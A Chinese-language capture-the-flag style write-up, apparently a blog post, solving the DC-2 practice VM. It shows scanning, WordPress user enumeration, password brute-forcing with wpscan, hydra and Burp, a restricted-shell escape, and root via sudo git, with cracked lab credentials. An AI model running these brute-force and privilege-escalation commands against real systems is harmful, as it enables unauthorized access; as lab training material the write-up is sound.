dc2靶机--暴力破解篇

要准备一台kali
一台dc2的靶机 靶机下载地址:https

一、信息收集

1.主机发现

nmap  -sn 192.168.77.0/24

在这里插入图片描述

2.端口扫描

 nmap -A -p- 192.168.77.133   (扫描全部端口)

在这里插入图片描述
发现开放了80(apache)端口和7744(ssh)端口

3.访问ip地址

发现访问失败
我在网上看到的教程需要把hosts解析文件给配置一下就可以了
Linux路径

vim/etc/hosts

windows路径

C:\Windows\System32\drivers\etc

在这里插入图片描述这次我们来进行访问一下,发现访问成功
成功跳转进来了
在这里插入图片描述搭眼一看发现是wordpress的cms,之前我们打过一个靶机就是这个的
我们再来研究研究
我们在页面上发现了flag的字样
我们进去看一下
在这里插入图片描述发现事情并不是想想的那么简单,但是我们翻译一下就发现简单许多了
看下面说的可以用cewl字典生成工具,这个就是可以将网站上的所有敏感的密码生成到一个文件里面
在这里插入图片描述

二、密码爆破

cewl http://dc-2/ -w ~/dc2.txt   //生成字典

在这里插入图片描述发现生成了好多敏感的密码

用户名枚举

wpscan --url http://dc-2 -e u

在这里插入图片描述发现枚举出来了三个
admin tom jerry
将这个三个用户名放到一个txt文档里面,方便到后面进行爆破
在这里插入图片描述

暴力破解

1.wpscan
wpscan --url http://dc-2  --passwords /dc2.txt  --usernames /dc2user.txt 

在这里插入图片描述

Username: jerry, Password: adipiscing
 Username: tom, Password: parturient

发现爆出来了tom和jerry

2.hydra

使用hydra表单暴力破解(上一种方法就可以,我这里为了复习一下知识,所以都写上了)

这个情况我们就需要先抓包,进行分析他的表单,要找到后台的表单就需要先知道他的后台登录的目录,然后我们要结合(三)进行目录爆破
再使用这个hydra来做
在这里插入图片描述进行抓包
在这里插入图片描述我们也可以在bp种进行暴力破解

然后构造hydra的payload

hydra -L dc2user.txt  -P dc2.txt  dc-2 http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'

在这里插入图片描述说实话用九头蛇非常麻烦,不如用上一个wpscan

3.brup

使用bp进行暴力破解
在这里插入图片描述首先将抓的包发送到暴力破解模块
设置攻击为最后一个集束炸弹

在这里插入图片描述设置payload
在这里插入图片描述
在这里插入图片描述
然后进行爆破就可以了

三、目录爆破

只单单是这样还是不够的,我们需要进行爆破目录,因为我们现在还不知道他的后台,这样没法暴力破解他的密码

dirb http://dc-2   

在这里插入图片描述首先我们进入他的后台登录页面
使用我们刚才爆破出来的密码,进行登录
在这里插入图片描述
Username: jerry, Password: adipiscing
Username: tom, Password: parturient
在这里插入图片描述我们使用jerry登录进去之后,点击flag2给的提示

这个提示说的不能用wordpress走捷径,所以我们只能利用之前的信息收集

发现了22端口也开放着,我们又知道了两个用户名和密码

登录一下试试

ssh -p 7744 tom@192.168.77.133

在经历了很多次的不明文密码的输入,终于登录成了
在这里插入图片描述进入终端命令行第一件事肯定要查看当前目录有什么,当我们进行cat的时候,发现了
他说没有这个命令,怎么可能呢,我去网上搜了一下,说的意思好像是有rbash的限制,我们要做的就是绕过rbash进行提权
在这里插入图片描述

四、提权

切换用户

查看文件,发现flag3,txt 执行命令发现 command not found,这是因为ssh远程连接到服务器的环境变量中不包含对应可执行文件的路径。需要自行添加

tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a 
$ /bin/bash
tom@DC-2:~$ export PATH=$PATH:/bin/
tom@DC-2:~$ export PATH=$PATH:/usr/bin

发现配置完成之后,可以直接进行执行命令

在这里插入图片描述我们在翻译一下内容是什么意思
在这里插入图片描述大概就是要切换到jerry用户
在这里插入图片描述发现切换成功
我们在进行查看一下目录里面有什么东西

在home目录下边的jerry的目录下边存在flag4.txt
在这里插入图片描述我们翻译过来看一下说的什么提示
在这里插入图片描述
大概是让我们提权的意思

以下是看的教程
查看jerry可以以root用户的身份执行git命令并且不需要密码
在这里插入图片描述

提权

两种方法

1、sudo git help config
在末行命令模式输入  !/bin/bash 或 !'sh' 完成提权
2、sudo git -p help
      !/bin/bash

我们这里用的第一种方法
在这里插入图片描述发现提权成功
在这里插入图片描述我们找找最后一个flag
在~目录下边
在这里插入图片描述完成~~~

  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值